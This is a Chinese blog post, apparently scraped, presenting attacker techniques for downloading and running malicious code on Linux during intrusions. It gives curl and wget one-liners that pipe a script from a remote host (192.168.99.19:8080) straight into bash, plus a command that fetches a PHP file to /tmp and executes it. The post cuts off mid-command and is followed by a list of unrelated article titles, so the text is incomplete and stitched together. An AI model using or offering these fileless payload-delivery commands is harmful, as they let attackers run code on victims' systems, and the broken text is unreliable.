通过命令下载执行恶意代码的几种姿势
在渗透过程中,攻击者往往需要通过命令下载执行恶意代码,实现信息收集、持久化、权限提升、防御绕过、提取凭证、横向移动、数据渗出等操作。
在目标主机执行恶意代码,可以分为上传/下载并执行恶意代码和无文件远程恶意代码执行。接下来,我们来总结一下Linux和Windows中下载和执行恶意代码的一些姿势。
一、Linux 远程恶意代码执行
01、curl
以用curl的方式执行http页面上的shell脚本,无需download,在本地机器上直接执行。
方式1:curl -fsSL http://192.168.99.19:8080/test.sh | bash方式2:bash < <( curl http://192.168.99.19:8080/test.sh )
02、wget
执行wget命令远程下载恶意程序。
方式1:wget -q -O- http://192.168.99.19:8080/test.sh | bash方式2:wget http://192.168.99.19:8080/shell.txt -O /tmp/x.php && php /tmp/x.php
curl+wget合并,实现无文件远程恶意代码执行。
bash -c '(curl -fsSL http://192.168.99.19:8080/test.sh||wget -q -O- http
通过命令下载执行恶意代码的几种姿势相关推荐
- VMware Mac版本漏洞可任意执行恶意代码
日前安全研究人员发现了一个存在于虚拟化软件VMware Mac版本Fusion中的严重安全漏洞,该漏洞可以通过Windows虚拟机在Mac主机上执行恶意代码,VMware已经发布了Fusion 2.0 ...
- Spring中Bean创建完成后执行指定代码的几种实现方式
Spring中Bean创建完成后执行指定代码的几种实现方式 1. 实现ApplicationListener接口 2. 实现InitializingBean接口 3. 使用@PostConstruct ...
- cscript 执行代码_在Windows上执行恶意代码 by cscriptmshta
Windows自带的可执行文件+合理构造的payload脚本=获得会话 cscript 简介 在cscript.exe来寻找和连接脚本的运行库,最常见的有VBScript和JavaScript. WS ...
- 涨见识了,在终端执行 Python 代码的 6 种方式
作者 | BRETT CANNON 译者 | 豌豆花下猫@Python猫 为了我们推出的 VS Code 的 Python 插件[1],我写了一个简单的脚本来生成变更日志[2](类似于Towncrie ...
- 在终端执行 Python 代码的 6 种方法,原来还能这样!
来自 | Python猫 编译 | 豌豆花下猫 原作 | BRETT CANNON 为了我们推出的 VS Code 的 Python 插件[1],我写了一个简单的脚本来生成变更日志[2](类似于To ...
- python交互式方式、代码文件方式_涨见识了,在终端执行 Python 代码的 6 种方式
原作:BRETT CANNON 译者:豌豆花下猫@Python猫 英文:https://snarky.ca/the-many-ways-to-pass-code-to-python-from-the- ...
- python花猫_涨见识了,在终端执行 Python 代码的 6 种方式!
原作: BRETT CANNON 译者:豌豆花下猫@Python猫 英文: https://snarky.ca/the-many-ways-to-pass-code-to-python-from-th ...
- 执行python代码的方式_涨见识了,在终端执行 Python 代码的 6 种方式!
译者:豌豆花下猫@Python猫 为了我们推出的 VS Code 的 Python 插件 [1],我写了一个简单的脚本来生成变更日志 [2](类似于Towncrier [3],但简单些,支持 Mark ...
- 用命令行执行java代码
最新文章
- 13.最为经典的动态规划入门
- python123程序设计题说句心里话_用c++写一个简单的计算器程序
- 解决CI框架的Disallowed Key Characters错误提示
- WCF入门(五)---创建WCF服务
- oracle学习笔记(十三) 查询练习(三) 子查询查询
- 微软提高 Microsoft 365 的漏洞奖励
- android surface windows,Android易混概念辨析之Surface,Window,View,SurfaceView,Bitmap
- ASM 转自三思笔记,改成自己看着舒服的格式而已
- 翻转课堂管理系统_ER图_功能图_数据字典_数据库脚本
- 计算机应用公式基础教学教案,《终稿[定稿]大学计算机应用基础全册教案版》...
- 计算机窗口的PPT,PPT幻灯片基础入门01-认识窗口界面
- Ubuntu与windows之间实现复制粘贴
- STARK Low Degree Testing——FRI
- Windows Server 2012 IPAM的管理
- android 无法后台运行,安卓模拟器无法后台?
- local-preference-实践理解(22/3/2)
- 好雨知时节 不甚欢喜
- Program type already present: com.google.gson.FieldAttributes
- 2019原创考研数学 基础过关660题 数学一
- flask template中使用Vue,遇到引入element-ui无效问题,Unknown custom element did you register the component correc
热门文章
- html点击超链接怎么打开ppt,ppt怎么查看所有超链接 设置完成后可以发现刚刚设置的超链...
- PMP思维导图 | 风险管理(一)
- mysql英雄联盟卡_《英雄联盟》LOL购物点怎麽获得?怎麽用?[图]
- 小红书和抖音的流量机制是什么?
- XUtils===XUtils3框架的基本使用方法
- 马小看前端(防抖和节流)
- 可怕的不是堕落,而是清楚自己在堕落
- Kubernetes基础:滚动升级回滚:rolling-update之rollback
- PyCharm 添加 外键的时候 报错 TypeError:__init__()missing 1 required positional argument:‘on_delete‘
- 一图看懂 aiohttp 模块:基于 asyncio 的异步HTTP网络库, 资料整理+笔记(大全)